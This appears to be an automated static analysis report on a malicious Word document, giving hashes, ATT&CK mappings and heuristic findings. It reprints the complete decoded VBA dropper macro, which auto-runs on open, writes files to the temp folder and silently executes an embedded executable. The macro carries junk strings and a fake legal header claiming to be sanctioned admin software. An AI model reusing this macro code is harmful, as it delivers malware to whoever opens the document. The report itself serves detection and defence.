Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ebf742b984166d60…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 100.0 KB
Created: 2015-11-03 07:55:00
Authoring application: Microsoft Office Word
First seen: 2017-10-10
MD5: d61a8d266d92f61dc53ac203b4dda4fe
SHA-1: f9f4b9528e2f69a1c1a15c9588485459e49640f1
SHA-256: ebf742b984166d605523156751ae03c6d6ac101520014009b10f3c691765f061
Risk Score: 594

Malware Insights

MITRE ATT&CK

  • T1059.005 Visual Basic
  • T1137.001 Office Application Build: VBA
  • T1204.002 Malicious File: User Execution
  • T1566.001 Spearphishing Attachment
  • T1027 Obfuscated Files or Information
  • T1105 Ingress Tool Transfer

The sample is a malicious Office document containing VBA macros. The AutoOpen macro is designed to drop and execute an embedded PE executable. Specifically, the script attempts to save files to 'C:\Windows\Temp\' with names like '322.rtf', '311.rtf', and 'wa1.fxe', and then uses CreateObject to open one of these dropped files, likely to execute the embedded payload. The presence of CreateProcess, LoadLibrary, and GetProcAddress API calls further supports the execution of a secondary payload.

Heuristics (18)

  • OLE with Ole10Native — possible CVE-2026-21514 exploitation [high] CVE_2026_21514
    Document contains a Word OLE object with Ole10Native plus executable, PE, or risky remote-link indicators. CVE-2026-21514 exploits OLE metadata validation; this stronger structure is treated as likely exploitation.
  • ClamAV: Doc.Downloader.Generic-6698421-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • Embedded PE executable [critical] OLE_EMBEDDED_EXE
    MZ/PE header found inside document; possible embedded executable.
  • Ole10Native package drops an auto-executable payload [critical] OFFICE_PACKAGE_RISKY_FILE
    OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
  • VBA macros detected [medium] OLE_VBA_MACROS (7 related findings)
    Document contains VBA macro code.
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Matched lines in script:
    Dim ssJHjksad As Variant
    ssJHjksad = Shell(njqbwdasd, 0)
    BVJKHKQWD = "askhdjk ashdklas *Yias jkdas"
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    Matched lines in script:
    Malfsad (2)
    Set mmmSdhjas = CreateObject("Word.Application")
    mmmSdhjas.Visible = False
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    Matched lines in script:
    Sub AutoOpen()
        HDUQGBANMSD = "^&GJHG ASKJD AJKSHD ASJdjsah ajkshd"
  • Workbook_Open macro [low] OLE_VBA_WBOPEN
    Matched lines in script:
    End Function
    Sub Workbook_Open()
        POIOJAKSLD = "88a sdu hSAjk dgjsadhkjashd as"
  • Auto_Open macro [low] OLE_VBA_AUTO
    Matched lines in script:
    Sub Auto_Open()
        Sunasay
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    Matched lines in script:
    SNP = _
    Environ$(SSBBDD) + BNJWDASDDD
    HUQS = "."
  • Reference to CreateProcess API [high] SC_STR_CREATEPROCESS
  • Reference to LoadLibrary API [high] SC_STR_LOADLIBRARY
  • Reference to GetProcAddress API [high] SC_STR_GETPROCADDRESS
  • Suspicious extracted artifact [high] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2237 bytes
SHA-256: a75f8ccc91d1e66c3b34ac93ce28eea8ac3753bd256b88c93d544cf427007a00
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'==========================================================================================
' Legal
' Macros Software for system administrators for installing new software by sending
' doc files with macros for their client.
' Diverse Lynx LLC - USA
' (c) 2015 All rights reserved
' US Office 300 Alexander Park
' Suite #200
' Princeton, NJ 08540
' Using this macros is illegal for other companies!
'==========================================================================================

Sub AutoOpen()
    HDUQGBANMSD = "^&GJHG ASKJD AJKSHD ASJdjsah ajkshd"
    Mukaka
End Sub

Sub Mukaka()
    QWHDJKASDH = "12i391uu128937b1892 816312893"
    Sunasay
End Sub

Sub Sunasay()
Dim TEX As String, haa As Integer, HBDS As Date
BNJWDASDDD = "\"
SSBBDD = "TE"
haa = Sgn(-65 + CInt(Minute(Now)))
On Error Resume Next
SSBBDD = SSBBDD & "MP"
SNP = _
Environ$(SSBBDD) + BNJWDASDDD
HUQS = "."
FEFE = HUQS & Chr(102 + haa) + "xe"
DEDE = HUQS + "rt" & Chr(102)

TCA = SNP + "322" + DEDE
TCB = SNP + "311" + DEDE
TEX = SNP + "wa1" & "" + FEFE


MafDid (TCA)
MafDid (TCB)
Malfsad (2)
Set mmmSdhjas = CreateObject("Word.Application")
mmmSdhjas.Visible = False
mmmSdhjas.Documents.Open (TCA)
Malfsad (2)
HQUDHSA = Faktal(TEX)
Malfsad (1)
mmmSdhjas.Quit
Set mmmSdhjas = Nothing
End Sub
Public Function MafDid(Name As String)
    ActiveDocument.SaveAs FileName:=Name, FileFormat:=wdFormatRTF
End Function
Sub Workbook_Open()
    POIOJAKSLD = "88a sdu hSAjk dgjsadhkjashd as"
    Sunasay
End Sub

Sub Malfsad(Lotosd As Long)
Dim Massdn As Long
Massdn = Timer + Lotosd
Do While Timer < Massdn
DoEvents
Loop
AAJHKBMN = "asdjlak s)_ ias dj"
End Sub

Public Function Faktal(njqbwdasd As String)
Dim ssJHjksad As Variant
ssJHjksad = Shell(njqbwdasd, 0)
BVJKHKQWD = "askhdjk ashdklas *Yias jkdas"
End Function

Sub Auto_Open()
    Sunasay
    AAKJQWKNDASD = "8asdyi ashkasj"
End Sub

Filename: embedded_office_00004c53.exe
Kind: embedded-pe
Source: Office MZ+PE at offset 0x4C53
Size: 82865 bytes
SHA-256: 2621d5bc20f04442e0a8e467fcce2b838d8b6445d5e974ac296b9de1ab92d859
Detection: ClamAV: No threats found
Obfuscation or payload: likely
Carved macro source contains an auto-exec entry point and execution/download terms.

Filename: ole10native_00.bin
Kind: ole-package
Source: OLE Ole10Native stream: ObjectPool/_1508069919/Ole10Native
Size: 60635 bytes
SHA-256: ae67e77f590dca2e23f7d388b01c7c16654c26a7b0f38408e6e9f926572e13dd